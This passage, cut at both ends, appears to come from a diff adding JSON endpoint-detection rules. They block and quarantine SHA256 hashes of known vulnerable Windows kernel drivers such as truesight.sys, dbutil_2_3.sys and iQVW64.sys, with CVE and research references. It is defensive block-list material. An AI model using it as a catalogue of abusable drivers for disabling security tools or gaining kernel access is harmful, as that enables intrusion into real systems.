"b8ca82693f85a31d0dca7731fdc112d5cf619d3c65deebb58b0f1d9b045b7d4f", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8dc5fb8c-f347-5b3c-bc21-a026ce5505f0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.972072Z", + "creation_date": "2026-03-23T11:45:29.972074Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.972079Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b51ddcf8309c80384986dda9b11bf7856b030e3e885b0856efdb9e84064917e5", + "comment": "Intel Ethernet diagnostics vulnerable driver (aka iQVW64.sys) [CVE-2015-2291] [https://www.loldrivers.io/drivers/1d2cdef1-de44-4849-80e5-e2fa288df681/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8ddda757-36db-577d-a31d-d35b5e272919", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 
1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.491965Z",
+ "creation_date": "2026-03-23T11:45:31.491967Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.491973Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7f98e425d04b84057f995dccfd76941b40baa512a839440a325a3255d7c964a4",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8de7054e-720b-5521-970d-1843c428d0cb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.620600Z",
+ "creation_date": "2026-03-23T11:45:29.620602Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.620610Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "54841d9f89e195196e65aa881834804fe3678f1cf6b328cab8703edd15e3ec57",
+ "comment": "IBM Vulnerable Physmem drivers (aka citmdrv_amd64.sys and citmdrv_ia64.sys) 
[https://www.loldrivers.io/drivers/0f21a584-6ace-4242-82cb-9766cea6973a/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8df0eef2-ab25-56a2-a736-f5f282230a36",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.621547Z",
+ "creation_date": "2026-03-23T11:45:29.621549Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.621554Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7b0f442ac0bb183906700097d65aed0b4b9d8678f9a01aca864854189fe368e7",
+ "comment": "ASUSTeK GPU vulnerable physmem driver (aka AsIO2_64.sys) [https://syscall.eu/blog/2020/03/30/asus_gio/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8df3933f-628a-59af-b984-9f1d3c92a03e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.459921Z",
+ "creation_date": "2026-03-23T11:45:30.459925Z",
+ "enabled": true,
+ "block_on_agent": true,
+
"quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.459933Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "45b07a2f387e047a6bb0e59b7f22fb56182d57b50e84e386a38c2dbb7e773837", + "comment": "Vulnerable Kernel Driver (aka LgDataCatcher.sys) [https://www.loldrivers.io/drivers/5961e133-ccc3-4530-8f4f-5d975c41028d/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8dfae742-47d8-5c9c-9217-cbd112a1048b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.607183Z", + "creation_date": "2026-03-23T11:45:29.607185Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.607191Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "96ee751f7c38731e97773e07e0f13f4dd361af9aaa1d30b41652c2e6efc3fb3e", + "comment": "Dell vulnerable driver (aka dbutil_2_3.sys) [CVE-2021-21551] [https://github.com/SpikySabra/Kernel-Cactus] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8e08e94f-ebd1-531d-9eb4-e8d8ff16ff99", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": 
"quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.828614Z", + "creation_date": "2026-03-23T11:45:30.828616Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.828621Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e18f303d27c753bee0f90637e5a8c3ae1f76276d1419430a335c2d2b0b66f3b6", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8e11b7fe-6820-5c0a-888f-4a4b5ee0452a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.975804Z", + "creation_date": "2026-03-23T11:45:29.975806Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.975812Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], 
+ "type": "hash", + "value": "7419b05e74733d2b7ce4c860ab74043b816a7f66a1ff7eec81fe3b35730e3bbb", + "comment": "Novell XTier vulnerable driver (aka libnicm.sys) [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8e1783a9-8e63-5d78-bc12-47c7c81bc7e3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.828203Z", + "creation_date": "2026-03-23T11:45:31.828205Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.828210Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b6c5360fb5cf9a441c51255d27039ceebdcf532e25c98a41c5facf6b00ae05c4", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8e26b953-ce06-58eb-92ea-3095be8f5477", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": 
"af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.822789Z", + "creation_date": "2026-03-23T11:45:31.822792Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.822801Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2e1a9526605bbdcf72085e2fecec7ce06265af73aa196a963fc9d1122b1883ec", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8e395393-6f7e-5edd-aea7-8f25beb5122e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.605629Z", + "creation_date": "2026-03-23T11:45:29.605631Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.605637Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e07211224b02aaf68a5e4b73fc1049376623793509d9581cdaee9e601020af06", + "comment": 
"Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8e4388f7-051f-5d35-ada0-4292d97f356b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.830908Z", + "creation_date": "2026-03-23T11:45:30.830910Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.830916Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c7c3a0128e7111625f77f9a7ff615a297e60c293c1532523685d67f88054bde9", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8e50f6ca-d6a1-5365-bb90-65483a5369e5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + 
"last_update": "2026-03-23T11:45:30.826132Z", + "creation_date": "2026-03-23T11:45:30.826135Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.826140Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "027000b80fb5c703aeb2de72dd540653392eab608142bbba13f949345c101b28", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8e54f236-0506-58e1-85f1-3a2720b8a492", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.486971Z", + "creation_date": "2026-03-23T11:45:31.486974Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.486982Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5f7621d4651e80986142b4673dc335e39708b4cfef21b71ddd955ae31a14657c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file 
SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8e5546b9-f808-5feb-b6a7-180022cb715d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.983211Z", + "creation_date": "2026-03-23T11:45:29.983213Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.983218Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2e6b339597a89e875f175023ed952aaac64e9d20d457bbc07acf1586e7fe2df8", + "comment": "Vulnerable Kernel Driver (aka DBUtilDrv2.sys) [https://www.loldrivers.io/drivers/bb808089-5857-4df2-8998-753a7106cb44/,https://www.rapid7.com/blog/post/2021/12/13/driver-based-attacks-past-and-present/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8e627923-faec-52af-bfd6-1d37a2bbb2c8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.616381Z", + "creation_date": "2026-03-23T11:45:29.616383Z", + "enabled": true, + 
"block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.616389Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7c942801884999057aabdc01707570371afdb077979ee2f318c05276123b78e7", + "comment": "American Megatrends vulnerable BIOS flash tool (aka UCOREW64.SYS and amifldrv64.sys) [https://www.loldrivers.io/drivers/a338a9fc-9fe3-400c-9fe4-69bb7892602d/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8e678966-9e56-54ff-9907-ed85717d537d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.144124Z", + "creation_date": "2026-03-23T11:45:31.144126Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.144131Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b7b7774480af293fbfac7f3c038b897d54aab36afe0afae210b3640b40fefec8", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8e6c7db6-3880-5c46-a654-5f9ef85665ca", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.834003Z", + "creation_date": "2026-03-23T11:45:30.834006Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.834014Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "61f139d722bea6618c688a7f74b5a04907c7308d9fc434a1033439f0d26c90b0", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8e6cc692-fde4-55cd-8d3b-4ba23c2f1457", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.823773Z", + "creation_date": "2026-03-23T11:45:30.823775Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:30.823780Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7d4862fb20b01f19eaf86774ecbb20a137163d969554ac9b91c3c92fe103ea7a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8e744983-55ae-50bc-97fe-db3663208398", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.620441Z", + "creation_date": "2026-03-23T11:45:29.620443Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.620448Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d8459f7d707c635e2c04d6d6d47b63f73ba3f6629702c7a6e0df0462f6478ae2", + "comment": "IBM Vulnerable Physmem drivers (aka citmdrv_amd64.sys and citmdrv_ia64.sys) [https://www.loldrivers.io/drivers/0f21a584-6ace-4242-82cb-9766cea6973a/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8e7965f9-9d49-53e1-835c-cbdcd2a34e50", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + 
"rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.473367Z", + "creation_date": "2026-03-23T11:45:30.473370Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.473379Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "78d49094913526340d8d0ef952e8fe9ada9e8b20726b77fb88c9fb5d54510663", + "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8e84d1be-7d77-5fa8-9192-c8f8cce37711", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.152804Z", + "creation_date": "2026-03-23T11:45:31.152807Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.152815Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"61923c135d0847549f5869a5a91d78ba945e3f5c1c6d5b31dfe34ad8911b5ae3", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8e8b25dc-55b4-5ebd-bd03-c46da2ce3f13", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.618023Z", + "creation_date": "2026-03-23T11:45:29.618025Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.618030Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "423d58265b22504f512a84faf787c1af17c44445ae68f7adcaa68b6f970e7bd5", + "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8eaeaf65-32d8-5555-9dd8-764cc57ee5a0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": 
